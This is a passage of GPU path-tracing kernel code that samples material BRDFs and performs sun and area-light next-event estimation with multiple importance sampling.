(materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; emission_uv.x = uv[0]; emission_uv.y = uv[1]; emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] * intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; if (brdf_pdf == -1.0f) { ray_state[RS_STATE] = STATE_END; return; } float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(dot_ni)) * emitter_prob; float mis = 1.0f; if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { mis = MIS(brdf_pdf, emitter_pdf); } else if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * emitter_color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * emitter_color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * emitter_color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } } /// __global__ void Sample(float* ray_state, Material* materials, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t normal_atlas, hipTextureObject_t metallic_atlas, hipTextureObject_t emission_atlas, hipTextureObject_t sun_table, Sun sun, hipTextureObject_t environment_map, EnvironmentProperties environment_properties, EmitterIndex* emitters, int32_t emitter_count, PortalIndex* portals, int32_t portal_count, uint4 b_seeds_0, uint4 b_seeds_1, uint4 b_seeds_2, uint4 b_seeds_3, int32_t width, int32_t height, int32_t sample_sun) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float last_brdf_pdf; float new_brdf_pdf; float sn[3]; float vn[3]; float n[3]; float n_tangent[3]; float n_binormal[3]; float ld_i[3]; float old_throughput[3]; float albedo[3]; float metallic; float smoothness; bool glass_material; { float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - 
u - v; uint32_t tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; uint32_t mat_id; float uv[2]; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); sn[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); sn[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); sn[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[tri_index].material_id; sn[0] = triangles[tri_index].surface_normal[0]; sn[1] = triangles[tri_index].surface_normal[1]; sn[2] = triangles[tri_index].surface_normal[2]; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } glass_material = (materials[mat_id].glass > 0.0f); float d_i[3]; d_i[0] = -ray_state[RS_DIR_X]; d_i[1] = -ray_state[RS_DIR_Y]; d_i[2] = -ray_state[RS_DIR_Z]; albedo[0] = materials[mat_id].albedo[0]; albedo[1] = materials[mat_id].albedo[1]; albedo[2] = materials[mat_id].albedo[2]; if (materials[mat_id].map_flags & MAP_FLAG_ALBEDO) { float2 albedo_uv; albedo_uv.x = uv[0]; albedo_uv.y = uv[1]; albedo_uv.x = lerp(materials[mat_id].albedo_bounds[0] + 0.5f, materials[mat_id].albedo_bounds[1] - 0.5f, albedo_uv.x); albedo_uv.y = lerp(materials[mat_id].albedo_bounds[2] + 0.5f, materials[mat_id].albedo_bounds[3] - 0.5f, albedo_uv.y); float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, albedo_uv.y); albedo[0] *= albedo_map.y; albedo[1] *= albedo_map.z; albedo[2] *= albedo_map.w; } if (materials[mat_id].map_flags & MAP_FLAG_NORMAL) { float2 normal_uv; normal_uv.x = uv[0]; normal_uv.y = uv[1]; normal_uv.x = lerp(materials[mat_id].normal_bounds[0] + 0.5f, materials[mat_id].normal_bounds[1] - 0.5f, normal_uv.x); normal_uv.y = lerp(materials[mat_id].normal_bounds[2] + 0.5f, materials[mat_id].normal_bounds[3] - 0.5f, normal_uv.y); float4 normal_map = tex2D<float4>(normal_atlas, normal_uv.x, normal_uv.y); float vn_tangent[3], vn_binormal[3]; GET_VT_BASIS(vn, vn_tangent, vn_binormal); float ln[3]; ln[0] = normal_map.x * 2.0f - 1.0f; ln[1] = normal_map.z * 2.0f - 1.0f; ln[2] = sqrt(1.0f - 
saturate(ln[0] * ln[0] + ln[1] * ln[1])); ROTATE_TO_BASIS(ln, vn, vn_tangent, vn_binormal, n); } else { n[0] = vn[0]; n[1] = vn[1]; n[2] = vn[2]; } NORMALIZE(n); if (!glass_material && (DOT(d_i, sn) < 0.0f)) { n[0] = -n[0]; n[1] = -n[1]; n[2] = -n[2]; } metallic = materials[mat_id].metallic; smoothness = materials[mat_id].smoothness; if (materials[mat_id].map_flags & MAP_FLAG_METALLIC) { float2 metallic_uv; metallic_uv.x = uv[0]; metallic_uv.y = uv[1]; metallic_uv.x = lerp(materials[mat_id].metallic_bounds[0] + 0.5f, materials[mat_id].metallic_bounds[1] - 0.5f, metallic_uv.x); metallic_uv.y = lerp(materials[mat_id].metallic_bounds[2] + 0.5f, materials[mat_id].metallic_bounds[3] - 0.5f, metallic_uv.y); float4 metallic_map = tex2D<float4>(metallic_atlas, metallic_uv.x, metallic_uv.y); metallic *= metallic_map.y; smoothness *= metallic_map.x; } float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; GET_BASIS(n, n_tangent, n_binormal); RELATIVE_TO_BASIS(d_i, n, n_tangent, n_binormal, ld_i); float ggx_pdf; float ln_facet[3]; if (smoothness == 1.0f) { ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; ggx_pdf = DIRAC_PDF; } else { float ggx_samples[2]; PRNG(global_id, b_seeds_0.x, ggx_samples[0]); PRNG(global_id, b_seeds_0.y, ggx_samples[1]); GGX_SAMPLE(ld_i, roughness, ggx_samples[0], ggx_samples[1], ln_facet); float g1, eval; SMITH_G1(ld_i, ln_facet, roughness, g1); GGX_EVAL(ln_facet, roughness, eval); ggx_pdf = g1 * fabs(DOT(ld_i, ln_facet)) * eval / fabs(ld_i[2]); } if (ld_i[2] == 0.0f) { ggx_pdf = 0.0f; } last_brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float brdf_color[3]; float ld_o[3]; float sample_dice; PRNG(global_id, b_seeds_0.z, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface float fresnel, cos_theta_t; DIELECTRIC_FRESNEL(ld_i[2], 1.5f, cos_theta_t, fresnel); float reflect_sample; PRNG(global_id, b_seeds_0.w, reflect_sample); if (reflect_sample <= (fresnel * coating_dropoff)) { // Reflect float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = 1.0f; brdf_color[1] = 1.0f; brdf_color[2] = 1.0f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf; new_brdf_pdf *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Transmit if (glass_material) { // Refract float ior = (cos_theta_t < 0.0f) ? 
(1.0f / 1.5f) : 1.5f; float ior_2 = ior * ior; float dot_ni = DOT(ln_facet, ld_i); float c = dot_ni * ior + cos_theta_t; ld_o[0] = ln_facet[0] * c - ld_i[0] * ior; ld_o[1] = ln_facet[1] * c - ld_i[1] * ior; ld_o[2] = ln_facet[2] * c - ld_i[2] * ior; copysign(ld_o[2], -ld_o[1]); NORMALIZE(ld_o); if ((cos_theta_t == 0.0f) || (ld_i[2] * ld_o[2] >= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = albedo[0] * ior_2; brdf_color[1] = albedo[1] * ior_2; brdf_color[2] = albedo[2] * ior_2; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { float dot_no = DOT(ln_facet, ld_o); new_brdf_pdf = ggx_pdf; float sqrt_denom = dot_ni + ior * dot_no; float dwh_dwo = (ior_2 * dot_no) / (sqrt_denom * sqrt_denom); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Diffuse ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; float ln_tangent[3]; float ln_binormal[3]; GET_BASIS(ln_facet, ln_tangent, ln_binormal); float hemi_sample[2]; PRNG(global_id, b_seeds_1.x, hemi_sample[0]); PRNG(global_id, b_seeds_1.y, hemi_sample[1]); float hemi_d[3]; CONCENTRIC_HEMI(hemi_sample[0], hemi_sample[1], hemi_d); ROTATE_TO_BASIS(hemi_d, ln_facet, ln_tangent, ln_binormal, ld_o); ld_o[2] = fabs(ld_o[2]); brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; new_brdf_pdf = INV_PI * ld_o[2]; } } } else { // Conductor float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { float f; CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); brdf_color[0] = albedo[0] * f; brdf_color[1] = albedo[1] * f; brdf_color[2] = albedo[2] * f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf / (4.0f * DOT(ld_o, ln_facet)); } } } } float d_o[3]; ROTATE_TO_BASIS(ld_o, n, n_tangent, n_binormal, d_o); ray_state[RS_LAST_BRDF_PDF] = new_brdf_pdf; old_throughput[0] = ray_state[RS_THROUGHPUT_R]; old_throughput[1] = ray_state[RS_THROUGHPUT_G]; old_throughput[2] = ray_state[RS_THROUGHPUT_B]; ray_state[RS_THROUGHPUT_R] = old_throughput[0] * brdf_color[0]; ray_state[RS_THROUGHPUT_G] = old_throughput[1] * brdf_color[1]; ray_state[RS_THROUGHPUT_B] = old_throughput[2] * brdf_color[2]; ray_state[RS_DIR_X] = d_o[0]; ray_state[RS_DIR_Y] = d_o[1]; ray_state[RS_DIR_Z] = d_o[2]; ray_state[RS_STATE] = STATE_SECONDARY; } float sun_d[3]; sun_d[0] = FLT_MAX; if (sample_sun > 0) { float theta, z; PRNG(global_id, b_seeds_1.z, theta); PRNG(global_id, b_seeds_1.w, z); theta *= TAU; z = (z * (1.0f - SUN_COS_THETA)) + SUN_COS_THETA; float z2 = sqrt(1.0f - (z * z)); float sun_ld_o[3]; sun_ld_o[0] = z2 * cos(theta); sun_ld_o[1] = z2 * sin(theta); sun_ld_o[2] = z; float sun_tangent[3]; float sun_binormal[3]; GET_BASIS(sun.direction, sun_tangent, sun_binormal); ROTATE_TO_BASIS(sun_ld_o, sun.direction, sun_tangent, sun_binormal, sun_d); 
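/* Sun next-event estimation: the direction rotated into world space above lies
   in the cone around sun.direction defined by SUN_COS_THETA (z sampled
   uniformly in [SUN_COS_THETA, 1], theta in [0, TAU)). The code below looks up
   the sky radiance for that direction in sun_table, evaluates the surface BRDF
   for the same direction, and stores an MIS-weighted contribution in RS_SUN_*;
   the shadow ray itself is traced later in the NEE kernel. */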
sun_d[1] = fmax(0.01f, sun_d[1]); NORMALIZE(sun_d); float cos_at_tri = DOT(sun_d, n); if (cos_at_tri <= 0.0f) { sun_d[0] = FLT_MAX; } else { float sun_color[3]; float brdf_color[3]; float brdf_pdf; float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); float s = -6360.5f * sun_d[1]; float mu = -s * 0.00015722034f; float nu = sun_d[0] * sun.direction[0] + sun_d[1] * sun.direction[1] + sun_d[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / NOT_ZERO(raymie.x) * (beta_r.x / beta_r); float4 sun_result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; sun_result.x *= sun.color[0]; sun_result.y *= sun.color[1]; sun_result.z *= sun.color[2]; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float horizon_falloff = fabs(sun_d[1] - 0.075f) - (sun_d[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); sun_color[0] = sun_result.x * multiplier; sun_color[1] = sun_result.y * multiplier; sun_color[2] = sun_result.z * multiplier; float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 10.0f)); float max_component = fmax(sun_color[0], fmax(sun_color[1], sun_color[2])); sun_color[0] = lerp(sun_color[0], max_component * 1.0f, horizon_bias); sun_color[1] = lerp(sun_color[1], max_component * 0.98f, horizon_bias); sun_color[2] = lerp(sun_color[2], max_component * 0.73f, horizon_bias); float ld_o[3]; RELATIVE_TO_BASIS(sun_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = glass_material && ((ld_i[2] * ld_o[2]) < 0.0f); if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? 
(1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 
1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } float mis = MIS(sun_pdf, brdf_pdf); ray_state[RS_SUN_R] = old_throughput[0] * (sun_color[0] / NOT_ZERO(sun_pdf)) * brdf_color[0] * mis; ray_state[RS_SUN_G] = old_throughput[1] * (sun_color[1] / NOT_ZERO(sun_pdf)) * brdf_color[1] * mis; ray_state[RS_SUN_B] = old_throughput[2] * (sun_color[2] / NOT_ZERO(sun_pdf)) * brdf_color[2] * mis; } } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float emitter_d[3]; emitter_d[0] = FLT_MAX; if (emitter_count > 0) { float emitter_uv_sample[2]; PRNG(global_id, b_seeds_2.z, emitter_uv_sample[0]); PRNG(global_id, b_seeds_2.w, emitter_uv_sample[1]); if ((emitter_uv_sample[0] + emitter_uv_sample[1]) >= 1.0f) { emitter_uv_sample[0] = 1.0f - emitter_uv_sample[0]; emitter_uv_sample[1] = 1.0f - emitter_uv_sample[1]; } float emit_u = emitter_uv_sample[0]; float emit_v = emitter_uv_sample[1]; float emit_w = 1.0f - emit_u - emit_v; float emitter_sample; PRNG(global_id, b_seeds_3.x, emitter_sample); uint emitter_choice = emitter_sample * emitter_count; EmitterIndex emitter_index = emitters[emitter_choice]; uint32_t emitter_tri_index = emitter_index.mesh_triangle_offset + emitter_index.triangle_offset; uint32_t tri_pixel = emitter_tri_index * 42; float emitter_position[3]; if (use_triangles_image) { emitter_position[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1)); emitter_position[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1)); emitter_position[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2)); } else { emitter_position[0] = triangles[emitter_tri_index].vertex[0] + (emit_u * triangles[emitter_tri_index].edges[0][0]) + (emit_v * -triangles[emitter_tri_index].edges[1][0]); emitter_position[1] = triangles[emitter_tri_index].vertex[1] + (emit_u * triangles[emitter_tri_index].edges[0][1]) + (emit_v * -triangles[emitter_tri_index].edges[1][1]); emitter_position[2] = triangles[emitter_tri_index].vertex[2] + (emit_u * triangles[emitter_tri_index].edges[0][2]) + (emit_v * -triangles[emitter_tri_index].edges[1][2]); } emitter_d[0] = emitter_position[0] - o[0]; emitter_d[1] = emitter_position[1] - o[1]; emitter_d[2] = emitter_position[2] - o[2]; float t_2 = DOT(emitter_d, emitter_d); float t = sqrt(t_2); 
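/* Emitter next-event estimation: a point has been sampled uniformly on one of
   the emitter triangles (the barycentric fold above keeps u + v inside the
   triangle, and the emitter is picked uniformly with probability
   1 / emitter_count). Below, the solid-angle pdf is formed as
   inverse_area * t^2 / |cos_at_emitter| * (1 / emitter_count), the BRDF toward
   the sampled point is evaluated, and the MIS-weighted contribution is stored
   in RS_EMITTER_*; visibility is resolved later in the NEE kernel using
   RS_EMITTER_T. */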
ray_state[RS_EMITTER_T] = t; float inv_t = 1.0f / t; emitter_d[0] *= inv_t; emitter_d[1] *= inv_t; emitter_d[2] *= inv_t; float emitter_n[3]; float inverse_area; uint mat_id; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); emitter_n[0] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2); emitter_n[1] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); emitter_n[2] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[emitter_tri_index].material_id; inverse_area = triangles[emitter_tri_index].inverse_area; emitter_n[0] = emit_w * triangles[emitter_tri_index].vertex_normals[0][0] + emit_u * triangles[emitter_tri_index].vertex_normals[1][0] + emit_v * triangles[emitter_tri_index].vertex_normals[2][0]; emitter_n[1] = emit_w * triangles[emitter_tri_index].vertex_normals[0][1] + emit_u * triangles[emitter_tri_index].vertex_normals[1][1] + emit_v * triangles[emitter_tri_index].vertex_normals[2][1]; emitter_n[2] = emit_w * triangles[emitter_tri_index].vertex_normals[0][2] + emit_u * triangles[emitter_tri_index].vertex_normals[1][2] + emit_v * triangles[emitter_tri_index].vertex_normals[2][2]; } NORMALIZE(emitter_n); float cos_at_emitter = DOT(-emitter_d, emitter_n); float cos_at_tri = DOT(emitter_d, n); if ((cos_at_emitter <= 0.0f) || (cos_at_tri <= 0.0f) || (t_2 < (HI_EPSILON * 4.0f))) { emitter_d[0] = FLT_MAX; } else { float brdf_color[3]; float brdf_pdf; float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(cos_at_emitter)) * emitter_prob; float intensity = materials[mat_id].emission * 25.0f; float emitter_color[3]; float uv[2]; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; if (use_triangles_image) { emission_uv.x = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2); emission_uv.y = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); } else { emission_uv.x = emit_w * triangles[emitter_tri_index].vertex_uvs[0][0] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][0] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][0]; emission_uv.y = emit_w * triangles[emitter_tri_index].vertex_uvs[0][1] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][1] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][1]; } emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] 
